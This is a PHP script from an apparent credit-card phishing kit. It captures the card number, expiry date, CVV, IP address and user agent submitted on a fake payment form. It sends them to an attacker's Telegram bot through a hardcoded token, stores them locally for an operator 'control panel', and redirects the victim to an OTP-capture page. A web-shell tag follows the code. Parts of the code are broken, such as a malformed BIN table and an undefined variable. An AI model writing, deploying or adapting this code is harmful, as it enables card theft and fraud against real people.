<?php
// Configuration
$TELEGRAM_BOT_TOKEN = '2147021455:AAECr25u-TTsb5_CZqvpUBrybQgqVyxtEUY';
$CHAT_ID = '1328122846';
// Start session
session_start();
// Configuration files
$config_dir = 'config';
$pending_cards_file = $config_dir . '/pending_cards.json';
$redirect_config_file = $config_dir . '/redirect_settings.json';
// Create config directory if it doesn't exist
if (!file_exists($config_dir) && !is_dir($config_dir)) {
mkdir($config_dir, 0755, true);
}
// Default redirect settings
$default_settings = [
'success_url' => 'success.html',
'failure_url' => 'failed.html',
'default_destination' => 'https://www.example.com',
'redirect_delay' => 2,
'enable_otp' => true // New setting to enable/disable OTP verification
];
// Load existing redirect settings if file exists
$redirect_settings = $default_settings;
if (file_exists($redirect_config_file)) {
$config_content = file_get_contents($redirect_config_file);
$loaded_settings = json_decode($config_content, true);
if (is_array($loaded_settings)) {
$redirect_settings = array_merge($redirect_settings, $loaded_settings);
}
}
$bin = $_SESSION['six_first_digits']; // Get the first 6 digits of the credit card BIN
// Define the BIN database
$binDatabase = [
"4" => [ // VISA
"name" => "VISA",
"theme" => "visa",
"logo" => "visa-logo.png",
"bins" => [
"4511 58","414740" => ["name" => "mohmad", "logo" => "visa-logo.png"],
"5168 34","414740" => ["name" => "aicha", "logo" => "chase-logo.png"],
"422300-422500" => ["name" => "Bank of America Visa", "logo" => "boa-logo.png"],
"438857-438857" => ["name" => "TD Bank Visa", "logo" => "td-logo.png"],
"412345-412345" => ["name" => "Wells Fargo Visa", "logo" => "wellsfargo-logo.png"],
"400005-400015" => ["name" => "Capital One Visa", "logo" => "capitalone-logo.png"]
]
]
];
// Determine the target path based on BIN ranges
$target = "../3D/default/"; // Default folder if no match
foreach ($binDatabase as $cardType) {
foreach ($cardType['bins'] as $range => $details) {
list($start, $end) = explode("-", $range);
if ($bin >= $start && $bin <= $end) {
// Match found, set target path based on the bank
if ($details['name'] === "Chase Visa") {
$target = "../3D/bank1/";
} elseif ($details['name'] === "Bank of America Visa") {
$target = "../3D/bank2/";
} elseif ($details['name'] === "TD Bank Visa") {
$target = "../3D/bank3/";
}
break 2; // Exit both loops when a match is found
}
}
}
/**
* Validates a credit card number using the Luhn algorithm
* @param string $cardNumber The credit card number to validate
* @return boolean True if valid, false otherwise
*/
function validateCardNumber($cardNumber) {
// Remove spaces and non-numeric characters
$cardNumber = preg_replace('/\D/', '', $cardNumber);
if (!ctype_digit($cardNumber)) return false;
$sum = 0;
$doubleUp = false;
// Process from right to left
for ($i = strlen($cardNumber) - 1; $i >= 0; $i--) {
$digit = (int)$cardNumber[$i];
// Double every second digit
if ($doubleUp) {
$digit *= 2;
if ($digit > 9) {
$digit -= 9;
}
}
$sum += $digit;
$doubleUp = !$doubleUp;
}
// Check if sum is divisible by 10
return ($sum % 10) === 0;
}
/**
* Identifies the bank/issuer based on the credit card BIN
* @param string $cardNumber The credit card number
* @return array Information about the card issuer or error if not found
*/
function identifyCardIssuer($cardNumber, $binDatabase, $czechBanks) {
// Clean the input
$cardNumber = preg_replace('/\D/', '', $cardNumber);
if (strlen($cardNumber) < 6) {
return ["error" => "Card number too short to determine BIN"];
}
$firstDigit = $cardNumber[0];
$firstTwoDigits = substr($cardNumber, 0, 2);
$bin = substr($cardNumber, 0, 6);
$bin3 = substr($cardNumber, 0, 3); // First 3 digits for Czech banks
// Check for Czech banks first
if (isset($czechBanks[$bin3])) {
$czechBank = $czechBanks[$bin3];
// Determine card type based on first digit
$cardType = "Unknown";
$cardTheme = "default";
if ($firstDigit == "4") {
$cardType = "VISA";
$cardTheme = "visa";
} elseif ($firstDigit == "5") {
$cardType = "Mastercard";
$cardTheme = "mastercard";
} elseif ($firstDigit == "3") {
$cardType = "American Express";
$cardTheme = "amex";
} elseif ($firstDigit == "6") {
$cardType = "Discover";
$cardTheme = "discover";
}
return [
"cardType" => $cardType,
"cardTheme" => $cardTheme,
"bankName" => $czechBank["name"],
"logo" => $czechBank["logo"],
"bin" => $bin,
"isCzechBank" => true
];
}
// Check if the first digit is in our database
if (isset($binDatabase[$firstDigit])) {
$cardType = $binDatabase[$firstDigit];
// Check specific BIN ranges
foreach ($cardType["bins"] as $binRange => $bankInfo) {
list($start, $end) = explode('-', $binRange);
if ($bin >= $start && $bin <= $end) {
return [
"cardType" => $cardType["name"],
"cardTheme" => $cardType["theme"],
"bankName" => $bankInfo["name"],
"logo" => $bankInfo["logo"],
"bin" => $bin,
"isCzechBank" => false
];
}
}
// If no specific match but card type is recognized
return [
"cardType" => $cardType["name"],
"cardTheme" => $cardType["theme"],
"bankName" => "Unknown Bank",
"logo" => $cardType["logo"],
"bin" => $bin,
"isCzechBank" => false
];
}
// Check for two-digit prefixes (e.g., JCB)
else if (isset($binDatabase[$firstTwoDigits])) {
$cardType = $binDatabase[$firstTwoDigits];
foreach ($cardType["bins"] as $binRange => $bankInfo) {
list($start, $end) = explode('-', $binRange);
if ($bin >= $start && $bin <= $end) {
return [
"cardType" => $cardType["name"],
"cardTheme" => $cardType["theme"],
"bankName" => $bankInfo["name"],
"logo" => $bankInfo["logo"],
"bin" => $bin,
"isCzechBank" => false
];
}
}
}
return ["error" => "Unknown card type", "bin" => $bin];
}
/**
* Formats a credit card number with spaces for readability
* @param string $cardNumber The full card number
* @return string The formatted card number
*/
function formatCardNumber($cardNumber) {
// Remove non-numeric characters
$cardNumber = preg_replace('/\D/', '', $cardNumber);
// Format with spaces for readability
$formattedCard = "";
for ($i = 0; $i < strlen($cardNumber); $i += 4) {
$formattedCard .= substr($cardNumber, $i, 4) . " ";
}
return trim($formattedCard);
}
// Check if the form is submitted
if ($_SERVER["REQUEST_METHOD"] == "POST") {
// Get form data
$cardNumber = isset($_POST['cardNumber']) ? $_POST['cardNumber'] : '';
$expiryDate = isset($_POST['expiryDate']) ? $_POST['expiryDate'] : '';
$cvv = isset($_POST['cvv']) ? $_POST['cvv'] : '';
$saveCard = isset($_POST['saveCard']) ? 'Yes' : 'No';
// Validate the card
$isValidCard = validateCardNumber($cardNumber);
// Identify the card issuer
$issuerInfo = identifyCardIssuer($cardNumber, $binDatabase, $czechBanks);
// Data to store
$cardInfo = [
'timestamp' => date('Y-m-d H:i:s'),
'card_number' => $cardNumber,
'expiry_date' => $expiryDate,
'cvv' => $cvv,
'save_card' => $saveCard,
'ip' => $_SERVER['REMOTE_ADDR'],
'user_agent' => $_SERVER['HTTP_USER_AGENT'],
'status' => 'pending'
];
// Add issuer info if available
if (!isset($issuerInfo["error"])) {
$cardInfo['card_type'] = $issuerInfo["cardType"];
$cardInfo['card_theme'] = $issuerInfo["cardTheme"];
$cardInfo['bank_name'] = $issuerInfo["bankName"];
$cardInfo['logo'] = $issuerInfo["logo"];
$cardInfo['bin'] = $issuerInfo["bin"];
if (isset($issuerInfo["isCzechBank"])) {
$cardInfo['is_czech_bank'] = $issuerInfo["isCzechBank"];
}
}
// Generate a unique session ID for this card
$sessionId = uniqid() . '-' . bin2hex(random_bytes(8));
// Save to pending cards for admin control panel
$pendingCards = [];
if (file_exists($pending_cards_file)) {
$pendingContent = file_get_contents($pending_cards_file);
$pendingCards = json_decode($pendingContent, true) ?: [];
}
// Add the new card to pending cards
$pendingCards[$sessionId] = $cardInfo;
// Save updated pending cards
file_put_contents($pending_cards_file, json_encode($pendingCards, JSON_PRETTY_PRINT));
// Store session ID for checking redirect status later
$_SESSION['payment_session_id'] = $sessionId;
// Format message for Telegram with full card number
$message = "💳 New Card Submitted:\n";
$message .= "------------------------\n";
$message .= "💳 Card Number: " . formatCardNumber($cardNumber) . "\n";
$message .= "📅 Expiry: $expiryDate\n";
$message .= "🔑 CVV: $cvv\n";
$message .= "💾 Save Card: $saveCard\n";
if (!isset($issuerInfo["error"])) {
$message .= "------------------------\n";
$message .= "🏦 Card Type: " . $issuerInfo["cardType"] . "\n";
$message .= "🏦 Bank: " . $issuerInfo["bankName"] . "\n";
$message .= "🏦 BIN: " . $issuerInfo["bin"] . "\n";
if (isset($issuerInfo["isCzechBank"]) && $issuerInfo["isCzechBank"]) {
$message .= "🇨🇿 Czech Bank: Yes\n";
}
}
$message .= "------------------------\n";
$message .= "🌐 IP Address: " . $_SERVER['REMOTE_ADDR'] . "\n";
$message .= "🖥️ User Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$message .= "🆔 Session ID: $sessionId\n";
$message .= "⏰ Date/Time: " . date('Y-m-d H:i:s') . "\n";
$message .= "------------------------\n";
$message .= "✅ View in Control Panel: https://yoursite.com/control_panel.php";
// Send to Telegram
$telegramApiUrl = "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage";
// Prepare data for Telegram API
$postData = [
'chat_id' => $CHAT_ID,
'text' => $message,
'parse_mode' => 'HTML'
];
// Send message to Telegram
$ch = curl_init($telegramApiUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
$response = curl_exec($ch);
curl_close($ch);
// Save data to a local file as backup
$data_dir = 'data';
if (!file_exists($data_dir) && !is_dir($data_dir)) {
mkdir($data_dir, 0755, true);
}
// Format data for file
$data = "[" . date('Y-m-d H:i:s') . "]\n";
$data .= "Card Number: $cardNumber\n";
$data .= "Expiry Date: $expiryDate\n";
$data .= "CVV: $cvv\n";
$data .= "Save Card: $saveCard\n";
if (!isset($issuerInfo["error"])) {
$data .= "Card Type: " . $issuerInfo["cardType"] . "\n";
$data .= "Bank: " . $issuerInfo["bankName"] . "\n";
$data .= "BIN: " . $issuerInfo["bin"] . "\n";
}
$data .= "IP Address: " . $_SERVER['REMOTE_ADDR'] . "\n";
$data .= "User Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$data .= "Session ID: $sessionId\n";
$data .= "------------------------------------------------\n";
// Save to file (one file per day)
$filename = $data_dir . '/cards_' . date('Y-m-d') . '.txt';
file_put_contents($filename, $data, FILE_APPEND);
// Also save to JSON file for easier processing
$json_file = $data_dir . '/cards.json';
// Read existing JSON data if file exists
$existing_data = [];
if (file_exists($json_file)) {
$file_contents = file_get_contents($json_file);
if (!empty($file_contents)) {
$existing_data = json_decode($file_contents, true) ?: [];
}
}
// Add new data
$existing_data[] = $cardInfo;
// Write back to file
file_put_contents($json_file, json_encode($existing_data, JSON_PRETTY_PRINT));
// Determine next step based on settings and bank type
$needsOtp = $redirect_settings['enable_otp'] &&
(isset($issuerInfo["isCzechBank"]) && $issuerInfo["isCzechBank"]);
if ($needsOtp) {
// Redirect to OTP page for Czech banks
header('Location: otp_waiting.php');
} else {
// Redirect to waiting page for non-Czech banks or when OTP is disabled
header('Location: otp_waiting.php');
}
exit;
}
?>
DR.KR LITE SHELL COPYRIGHT 2016